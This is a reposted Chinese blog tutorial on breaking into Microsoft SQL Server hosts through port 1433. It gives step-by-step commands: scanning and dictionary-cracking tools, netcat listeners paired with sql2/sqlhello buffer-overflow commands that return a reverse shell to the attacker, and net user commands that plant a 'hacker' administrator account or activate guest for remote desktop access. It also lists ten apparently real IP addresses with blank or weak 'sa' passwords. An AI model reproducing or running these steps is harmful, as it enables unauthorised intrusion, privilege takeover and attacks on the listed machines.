【转】1433端口入侵详解

最新推荐文章于 2024-05-10 05:30:49 发布
最新推荐文章于 2024-05-10 05:30:49 发布
阅读量3.5k 收藏 3
点赞数

scanport.exe 查有1433的机器

  SQLScanPass.exe 进行字典暴破(字典是关键)

  最后 SQLTools.exe入侵

  对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

  (以上反向的,测试成功)

  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)


久违的溢出工具

  用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。

  通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?

  先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了, 看来是成功溢出了,就这么简单。

  我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符 下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。

首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。


218.5.135.66     SQL-Server弱口令: "sa/1234"
218.14.115.111   SQL-Server弱口令: "sa/[空口令]"
218.12.38.52     SQL-Server弱口令: "sa/[空口令]"
218.12.97.14     SQL-Server弱口令: "sa/[空口令]"
218.6.242.228    SQL-Server弱口令: "sa/[空口令]"
222.100.119.3    SQL-Server弱口令: "sa/[空口令]"
222.105.67.200   SQL-Server弱口令: "sa/[空口令]"
222.105.28.130   SQL-Server弱口令: "sa/[空口令]"
222.106.60.51    SQL-Server弱口令: "sa/[空口令]"
222.117.107.1    SQL-Server弱口令: "sa/[空口令]"

在win2000机器上装了mssql的话,机器就会开1433端口。什么 什么是端口?就象食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433端口。溢出1433需要两个工具 nc.exe和sql2.exe。进攻方法就两步,在自己机器上开一个cmd窗口。对了,你要用win2000的话就在开始-运行-键入cmd回车就成了 饿。这里我们只用2000不说98。如果你把你的下的nc.exe和sql2.exe放在C:盘的话,就在你开的这个窗口打入命令c:>nc -1 -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-键入cmd灰尘,再开个窗口。在这个窗口写入命令c:> sql2.exe你要入侵网站的ip和你自己的ip 40 0回车。这里要作点说明:如何得到入侵网站的ip?在cmd下c:>ping 网址,就行了。自己的ip就不用我说了吧?算了还是说下吧,在cmd下键入ipconfig就可以了。其中命令行中的40你可以随便改成别的,但好象40 和53的成功率高一点。再是命令中的0不性的话,你就试试1或2。如果入侵网站有这个漏洞的话,那么你开的第一个窗口就会边成肉鸡的c:>winnt\ system32>.就是说,你已经进入它的机器里了。进去以后,你可以添加个拥护了。net user guest /active:yes用这个命令,就将默认禁止的guest拥护激火。net user guest 123456这样guest的密码变成了123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。

呵呵,基本就是这样了,,,,

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/11411056/viewspace-734406/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/11411056/viewspace-734406/

cuijianli8434
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
1433 mssql 安全_1433端口入侵及防范方法
weixin_39781323的博客
12-20 3730
该楼层疑似违规已被系统折叠隐藏此楼查看此楼关闭你的1433端口(MSSQL的1433端口)-附各种关闭端口方法MSSQL的1433端口,是给远程管理MSSQL用的,如果你的服务器无需用到1433端口,或者你只在服务器上直接管理,那么就把这个端口关掉吧,这个属于高危端口,很多黑客都是直接通过这个入侵。方法有四种:1、最简单的是在网卡TCP/IP协议的属性--高级--[TCP/IP筛选]里设置。方法...
SqlServer1433端口入侵检测工具
12-17
这是网上目前流行的针对mssql的入侵工具,首先进行半开式扫描,扫出开放1433端口的主机之后,再用xscan进行弱口令猜解,最后恢复管理员删除的存储过程,上传木马 进而达到控制主机的目的 mssql使用者可以用来检测自己的数据库是否能被轻易入侵
sql1433端口msf、hydra弱口令爆破,获得了sql-server的权限,通过几种方式能够提权
weixin_64655821的博客
08-31 3483
如果得到了1433端口,进行弱口令爆破 ,百度下1433端口,弱口令爆破的方式,kali 中msf hydra弱口令爆破 。总结获得弱口令,获得了sql-server的权限,通过几种方式能够提权。
网络安全最新攻击端口渗透剖析_135端口渗透(2),2024年最新卧槽
最新发布
2401_84264096的博客
05-10 1289
1433是SQLServer默认的端口,SQL Server服务使用两个端口:tcp-1433、UDP-1434.其中1433用于供SQLServer对外提供服务,1434用于向请求者返回SQLServer使用了哪些TCP/IP端口1433端口通常遭到黑客的攻击,而且攻击的方式层出不穷。最严重的莫过于远程溢出漏洞了,如由于SQL注射攻击的兴起,各类数据库时刻面临着安全威胁。利用SQL注射技术对数据库进行渗透是目前比较流行的攻击方式,此类技术属于脚本渗透技术。
常见端口漏洞利用总结
lovemine1314的博客
12-07 1393
常见端口漏洞利用总结
1433端口入侵
gxj022的专栏
09-25 4659
1433端口入侵 第一:1433的溢出攻击。 在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exe,在www.sandflee.net都有下载。进攻方法就两步:第一步,在自己机器上开一个cmd窗口。对了,你要用w
黑客常用端口利用总结
qq_43233085的博客
11-06 1331
黑客常用端口利用总结21:ftp/tftp/vsftpd文件传输协议22:ssh远程连接23:Telnet远程连接25/465:SMTP邮件服务53:DNS域名解析系统80/443:http/https135:DCOM服务139/445:Samba服务1433/1434:SQL Server服务1521:Oracle2049:NFS服务3306:mysql3389:Rdp远程桌面链接4899:ra...
445端口攻击详解/教学
03-22
445端口攻击 详解/教学 仅供教学。 后果自承,私人收藏
计算机端口详解.pdf
12-22
计算机端口详解 计算机端口是网络应用中非常重要的一部分,相当于“门”。在 Internet 上,各主机之间通过 TCP/IP 协议发送和接收数据报,各个数据报根据其目的主机的 IP 地址来进行路由选择。但是,问题出现在哪里...
计算机端口详解(1).pdf
12-22
计算机端口详解 端口在计算机网络中扮演着至关重要的角色,它们就像是应用程序与外界通信的“门”。每台计算机可以运行多个进程,而端口机制则确保了数据能够准确地送达正确的目标进程。当一个数据报通过TCP/IP协议...
计算机网络TCP/IP传输层端口详解
06-23
计算机网络中的端口是通信的重要组成部分,特别是在TCP/IP协议栈中。端口是标识网络上应用程序和服务的一种方式,它们使得不同服务可以在同一台主机上同时运行而不会相互干扰。端口号是一个16位的整数,范围从0到...
1433全修复命令,用于1433端口入侵
03-08
1433修复命令,xp_cmd恢复等命令大全
1433端口利用工具
06-20
这是比较好的端口破解工具,这不是问题,要20子够没
1433漏洞工具(全免杀)
06-19
1433漏洞工具(全免杀)
Windows_系统端口详解参照.pdf
12-02
端口的合理分配和封锁可以帮助防止恶意软件的入侵,确保服务的稳定性,并减少应用程序间的冲突。同时,对于需要特定端口的服务,可以使用保留端口功能来确保端口始终可用。总的来说,Windows系统端口的管理是一个...
【系统安全】1433/3306端口入侵与防护
不忘初心,护天下安全!
02-14 4879
一、1433端口 1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。 二、1433端口入侵 常见的1433端口入侵,即对MSSql服务的入侵,就是SA用户的弱口令扫描。 SA是Microsoft S...
各个网络端口入侵方法
Gerry的专栏
08-31 1598
1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.ex
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值